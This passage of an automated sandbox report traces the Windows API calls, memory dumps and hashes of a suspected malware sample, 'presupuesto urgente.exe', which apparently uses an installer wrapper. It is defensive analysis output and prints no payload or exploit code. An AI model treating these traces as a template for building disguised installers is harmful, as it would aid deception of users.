                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00406164
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040616B
                                                                                                                                                        • Part of subcall function 00405EA2: GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\presupuesto urgente.exe,80000000,00000003), ref: 00405EA6
                                                                                                                                                        • Part of subcall function 00405EA2: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                      • String ID: %ls=%ls$[Rename]
                                                                                                                                                      • API String ID: 2171350718-461813615
                                                                                                                                                      • Opcode ID: cc1e011b744674eb6045294d1f1ba8016b3cffab7c6b3a5cc0e4edd922729f6b
                                                                                                                                                      • Instruction ID: 7a97944e4ecdd21f919348e7cfc29446421eaa6be6f71a8f5a2bdcac5b6ce208
                                                                                                                                                      • Opcode Fuzzy Hash: cc1e011b744674eb6045294d1f1ba8016b3cffab7c6b3a5cc0e4edd922729f6b
                                                                                                                                                      • Instruction Fuzzy Hash: 953139703007157BC2206B259D49F673A6CEF45714F15003AFA42FA2D2DE7C992586AD
                                                                                                                                                      APIs
                                                                                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\presupuesto urgente.exe",00403464,C:\Users\user\AppData\Local\Temp\,76893420,004036D5,?,00000006,00000008,0000000A), ref: 004066A7
                                                                                                                                                      • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066B6
                                                                                                                                                      • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\presupuesto urgente.exe",00403464,C:\Users\user\AppData\Local\Temp\,76893420,004036D5,?,00000006,00000008,0000000A), ref: 004066BB
                                                                                                                                                      • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\presupuesto urgente.exe",00403464,C:\Users\user\AppData\Local\Temp\,76893420,004036D5,?,00000006,00000008,0000000A), ref: 004066CE
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Char$Next$Prev
                                                                                                                                                      • String ID: "C:\Users\user\Desktop\presupuesto urgente.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                      • API String ID: 589700163-1195545107
                                                                                                                                                      • Opcode ID: 77b224228f8c57f44dbd024cb25da7c2d773c522f2af8fdd1da9e6af7933f215
                                                                                                                                                      • Instruction ID: 91382b34e261ab6a6b837a41ec70345278d3faa82d58aea2d88f3062b19e38b1
                                                                                                                                                      • Opcode Fuzzy Hash: 77b224228f8c57f44dbd024cb25da7c2d773c522f2af8fdd1da9e6af7933f215
                                                                                                                                                      • Instruction Fuzzy Hash: 8C11E61580070295DB302B149C40E7766B8EF587A4F12483FED86B32C0E77E4CD286AD
                                                                                                                                                      APIs
                                                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 004043C9
                                                                                                                                                      • GetSysColor.USER32(00000000), ref: 004043E5
                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 004043F1
                                                                                                                                                      • SetBkMode.GDI32(?,?), ref: 004043FD
                                                                                                                                                      • GetSysColor.USER32(?), ref: 00404410
                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 00404420
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040443A
                                                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404444
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2320649405-0
                                                                                                                                                      • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                                                                                                      • Instruction ID: 701ae6dfa2b2a9365c03cf2c9b1b76f0db24f0feb35c46e7544c905291b2d973
                                                                                                                                                      • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                                                                                                      • Instruction Fuzzy Hash: 4B216671500704AFCB219F68DE48B5BBBF8AF81714F04893EED95E22A1D774E944CB54
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                                                                                                      • lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                                                                                                      • lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                                                                                                                      • SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2531174081-0
                                                                                                                                                      • Opcode ID: ae6ed24060c0e1e5203a454600f337dd8354be9e28b06d37a059070ec5477373
                                                                                                                                                      • Instruction ID: b4c9d1203d7b93b364d12d55a96473d81469f1a16e33619bfa53f57c996d0385
                                                                                                                                                      • Opcode Fuzzy Hash: ae6ed24060c0e1e5203a454600f337dd8354be9e28b06d37a059070ec5477373
                                                                                                                                                      • Instruction Fuzzy Hash: 0E219071900518BACF119FA5DD85ADFBFB4EF45364F10803AF904B62A0C3794A90CFA8
                                                                                                                                                      APIs
                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000), ref: 00402E8D
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00402EAB
                                                                                                                                                      • wsprintfW.USER32 ref: 00402ED9
                                                                                                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                                                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                                                                                                        • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                                                                                                                        • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EFD
                                                                                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402F0B
                                                                                                                                                        • Part of subcall function 00402E56: MulDiv.KERNEL32(00000000,00000064,0005D5FB), ref: 00402E6B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                      • String ID: ... %d%%
                                                                                                                                                      • API String ID: 722711167-2449383134
                                                                                                                                                      • Opcode ID: 9d96e1b775b00f8f1aa504ccf668d13eff31e418fbd4a6343fc61565dbea9545
                                                                                                                                                      • Instruction ID: c2ec4548d439a14d597b05689786213ff5532ac021c242b5895b0761ec4a5705
                                                                                                                                                      • Opcode Fuzzy Hash: 9d96e1b775b00f8f1aa504ccf668d13eff31e418fbd4a6343fc61565dbea9545
                                                                                                                                                      • Instruction Fuzzy Hash: 0501C430440724EBCB31AB60EF4CB9B7B68AB00B44B50417FF945F12E0CAB844558BEE
                                                                                                                                                      APIs
                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404CF9
                                                                                                                                                      • GetMessagePos.USER32 ref: 00404D01
                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00404D1B
                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D2D
                                                                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D53
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                                                      • String ID: f
                                                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                                                      • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                      • Instruction ID: b067d4b0ecc7c77c1c3f0caef97ada8ed48413e9bef28a1d47140c0a876cf8aa
                                                                                                                                                      • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                      • Instruction Fuzzy Hash: AD015E71A0021DBADB00DB94DD85BFEBBBCAF95715F10412BBA50B62D0C7B899018BA4
                                                                                                                                                      APIs
                                                                                                                                                      • GetDC.USER32(?), ref: 00401DB6
                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                                                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                                                                                                                      • CreateFontIndirectW.GDI32(0040CDE0), ref: 00401E38
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                      • String ID: Tahoma
                                                                                                                                                      • API String ID: 3808545654-3580928618
                                                                                                                                                      • Opcode ID: dd5e8fa4d463f4addcea7a8cc9fa64d55b0ecfa5d277173ec9cca7ca7d10c693
                                                                                                                                                      • Instruction ID: c2f05a2c3ba2ec5405c4fe8fe652dd8f1d703414ee124caa90b8b383e79e86eb
                                                                                                                                                      • Opcode Fuzzy Hash: dd5e8fa4d463f4addcea7a8cc9fa64d55b0ecfa5d277173ec9cca7ca7d10c693
                                                                                                                                                      • Instruction Fuzzy Hash: 3201B171904241EFE7006BB0AF4AB9A7FB0BF55301F10493EF242B71E2CAB800469B2D
                                                                                                                                                      APIs
                                                                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                                                                                                                      • wsprintfW.USER32 ref: 00402E29
                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402E39
                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E4B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                      • API String ID: 1451636040-1158693248
                                                                                                                                                      • Opcode ID: 5563c221c1669b5fd2184c8b70bdefae7b5ad080d5cf5862aa05c867891839d9
                                                                                                                                                      • Instruction ID: 0bc749b122006b2f9f6abad3e9991ed6065550717762caf8ffdc158a825a6066
                                                                                                                                                      • Opcode Fuzzy Hash: 5563c221c1669b5fd2184c8b70bdefae7b5ad080d5cf5862aa05c867891839d9
                                                                                                                                                      • Instruction Fuzzy Hash: 69F0367154020DABDF206F50DD4ABEA3B69FB00714F00803AFA06B51D0DBFD55598F99
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 1000256D
                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8114030407.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8113998987.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8114063244.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8114087670.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Global$Free$Alloc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1780285237-0
                                                                                                                                                      • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                                                                                                      • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                                                                                                                      • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                                                                                                      • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                                                                                                                      APIs
                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00402950
                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                                                                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2667972263-0
                                                                                                                                                      • Opcode ID: 71fa0d7f1f6972b2f5f4a603ea8383ed055fcf66cbac6c56c0d77bb029e8dc11
                                                                                                                                                      • Instruction ID: c824e8dfb1c84b3956194132b72a9c46ff30f807773af65f81dcebc4e122496d
                                                                                                                                                      • Opcode Fuzzy Hash: 71fa0d7f1f6972b2f5f4a603ea8383ed055fcf66cbac6c56c0d77bb029e8dc11
                                                                                                                                                      • Instruction Fuzzy Hash: 6521BFB1800128BBDF216FA5DE49D9E7E79EF09364F10023AF960762E0CB7949418B98
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C71
                                                                                                                                                      • wsprintfW.USER32 ref: 00404C7A
                                                                                                                                                      • SetDlgItemTextW.USER32(?,00423728), ref: 00404C8D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                      • String ID: %u.%u%s%s$(7B
                                                                                                                                                      • API String ID: 3540041739-1320723960
